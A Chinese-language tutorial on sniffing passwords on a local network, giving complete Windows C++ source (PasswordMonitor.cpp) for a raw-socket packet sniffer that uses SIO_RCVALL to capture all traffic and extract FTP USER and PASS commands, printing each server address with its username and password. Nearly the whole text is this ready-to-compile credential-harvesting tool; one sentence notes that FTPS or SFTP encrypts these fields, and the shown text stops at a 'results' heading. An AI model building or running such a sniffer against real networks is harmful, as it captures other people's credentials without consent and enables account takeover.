偵聽局域網內密碼

只需在前面的網絡嗅探程序基礎上,對解析出的端口號添加擴展處理即可。FTP 的 USER 和 PASS 命令在控制連接(端口 21)上以明文傳輸,所以能從封包中直接讀出;改用 FTPS 或 SFTP 後,這些內容會被加密:

代碼如下:

在 DecodeIPPacket 中添加:

// Dispatch on the TCP destination port (converted from network to host byte order).
switch(::ntohs(pTCPHdr->destinationPort))
{
case 21:    // FTP control port
    // The payload is taken to begin right after the fixed-size TCPHeader.
    GetFtp((char*)pTCPHdr + sizeof(TCPHeader), pIPHdr->ipDestination);
    break;

case 80:    // listed, but nothing is done for these ports
case 8080:
    break;
}

 

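// Extracts the user name and password from one FTP control-channel payload
// and prints them together with the server address.
//
// pData    - TCP payload. It must be NUL-terminated by the caller, because
//            strnicmp and sscanf stop only at a terminator.
// dwDestIp - destination IPv4 address, passed unchanged to inet_ntoa.
//
// The name taken from a USER command is kept in a static buffer and printed
// when a PASS command is seen.
void GetFtp(char *pData, DWORD dwDestIp)
{
    char szBuf[256];
    static char szUserName[21];
    static char szPassword[21];

    if(strnicmp(pData, "USER ", 5) == 0)
    {
        // %20s limits the copy to the 21-byte buffer; the payload comes from
        // the network and must not be allowed to overrun it.
        sscanf(pData + 4, "%*[ ]%20s", szUserName);
    }
    else if(strnicmp(pData, "PASS ", 5) == 0)
    {
        sscanf(pData + 4, "%*[ ]%20s", szPassword);

        // Both fields are at most 20 characters and a dotted IPv4 address at
        // most 15, so the formatted record fits in szBuf.
        wsprintf(szBuf, "Server Address:%s;User Name:%s;Password:%s;\n\n",
            ::inet_ntoa(*(in_addr*)&dwDestIp), szUserName, szPassword);

        // szBuf contains network-supplied text, so it is printed as data and
        // never used as the format string.
        printf("%s", szBuf);
    }
}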

完整程序如下:

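/////////////////////////////////////////////////
// PasswordMonitor.cpp

#include "../common/initsock.h"
#include "../common/protoinfo.h"
#include <stdio.h>
#include <mstcpip.h>

#pragma comment(lib, "Advapi32.lib")

CInitSock theSock;  // declared in initsock.h; presumably starts up Winsock - confirm

// Extracts the user name and password from one FTP control-channel payload
// and prints them together with the server address.
//
// pData    - TCP payload. It must be NUL-terminated by the caller, because
//            strnicmp and sscanf stop only at a terminator.
// dwDestIp - destination IPv4 address, passed unchanged to inet_ntoa.
//
// The name taken from a USER command is kept in a static buffer and printed
// when a PASS command is seen.
void GetFtp(char *pData, DWORD dwDestIp)
{
    char szBuf[256];
    static char szUserName[21];
    static char szPassword[21];

    if(strnicmp(pData, "USER ", 5) == 0)
    {
        // %20s limits the copy to the 21-byte buffer; the payload comes from
        // the network and must not be allowed to overrun it.
        sscanf(pData + 4, "%*[ ]%20s", szUserName);
    }
    else if(strnicmp(pData, "PASS ", 5) == 0)
    {
        sscanf(pData + 4, "%*[ ]%20s", szPassword);

        // Both fields are at most 20 characters and a dotted IPv4 address at
        // most 15, so the formatted record fits in szBuf.
        wsprintf(szBuf, " Server Address: %s; User Name: %s; Password: %s; \n\n",
            ::inet_ntoa(*(in_addr*)&dwDestIp), szUserName, szPassword);

        // szBuf contains network-supplied text, so it is printed as data and
        // never used as the format string.
        printf("%s", szBuf);    // the record could also be saved to a file here
    }
}

// Decodes one received IP packet and hands FTP control traffic to GetFtp.
//
// pData - start of the IP header. No length is passed in, so the caller must
//         supply a buffer that is zero-filled (or NUL-terminated) beyond the
//         received bytes.
void DecodeIPPacket(char *pData)
{
    IPHeader *pIPHdr = (IPHeader*)pData;

    // The low nibble of iphVerLen is the header length in 32-bit words.
    int nHeaderLen = (pIPHdr->iphVerLen & 0xf) * sizeof(ULONG);
    if(nHeaderLen < 20)     // shorter than the minimum IPv4 header: malformed
        return;

    switch(pIPHdr->ipProtocol)
    {
    case IPPROTO_TCP:
        {
            TCPHeader *pTCPHdr = (TCPHeader *)(pData + nHeaderLen);
            switch(::ntohs(pTCPHdr->destinationPort))
            {
            case 21:    // FTP
                // The payload is taken to begin right after the fixed-size TCPHeader.
                GetFtp((char*)pTCPHdr + sizeof(TCPHeader), pIPHdr->ipDestination);
                break;

            case 80:    // HTTP... (not handled)
            case 8080:
                break;
            }
        }
        break;

    case IPPROTO_UDP:
        break;

    case IPPROTO_ICMP:
        break;
    }
}

// Binds a raw socket to the first local address, enables SIO_RCVALL and
// passes every received packet to DecodeIPPacket.
// Returns 0 after the receive loop ends, 1 if set-up fails.
int main()
{
    // Create the raw socket
    SOCKET sRaw = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
    if(sRaw == INVALID_SOCKET)
        return 1;

    // Look up the local IP address
    char szHostName[56];
    SOCKADDR_IN addr_in;
    struct hostent *pHost;
    if(gethostname(szHostName, sizeof(szHostName)) == SOCKET_ERROR
        || (pHost = gethostbyname((char*)szHostName)) == NULL
        || pHost->h_addr_list[0] == NULL
        || pHost->h_length > (int)sizeof(addr_in.sin_addr))
    {
        closesocket(sRaw);
        return 1;
    }

    // The socket must be bound before ioctl is called
    memset(&addr_in, 0, sizeof(addr_in));
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(0);
    memcpy(&addr_in.sin_addr.S_un.S_addr, pHost->h_addr_list[0], pHost->h_length);
    printf(" Binding to interface : %s \n", ::inet_ntoa(addr_in.sin_addr));
    if(bind(sRaw, (PSOCKADDR)&addr_in, sizeof(addr_in)) == SOCKET_ERROR)
    {
        closesocket(sRaw);
        return 1;
    }

    // Set the SIO_RCVALL control code so that all IP packets are received
    DWORD dwValue = 1;
    if(ioctlsocket(sRaw, SIO_RCVALL, &dwValue) != 0)
    {
        closesocket(sRaw);
        return 1;
    }

    // Start receiving packets
    printf(" \n\n begin to monitor ftp password... \n\n");
    char buff[1024 + 1];    // one spare byte so the data is always NUL-terminated
    int nRet;
    while(TRUE)
    {
        // Clear the buffer so the parsers never read bytes left over from an
        // earlier packet or run past the end of the received data.
        memset(buff, 0, sizeof(buff));
        nRet = recv(sRaw, buff, sizeof(buff) - 1, 0);
        if(nRet == SOCKET_ERROR)
        {
            if(::WSAGetLastError() == WSAEMSGSIZE)
                continue;   // packet larger than the buffer: skipped, as before
            break;          // any other failure ends the loop so the socket is closed
        }
        if(nRet > 0)
        {
            DecodeIPPacket(buff);
        }
    }
    closesocket(sRaw);
    return 0;
}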

執行結果:
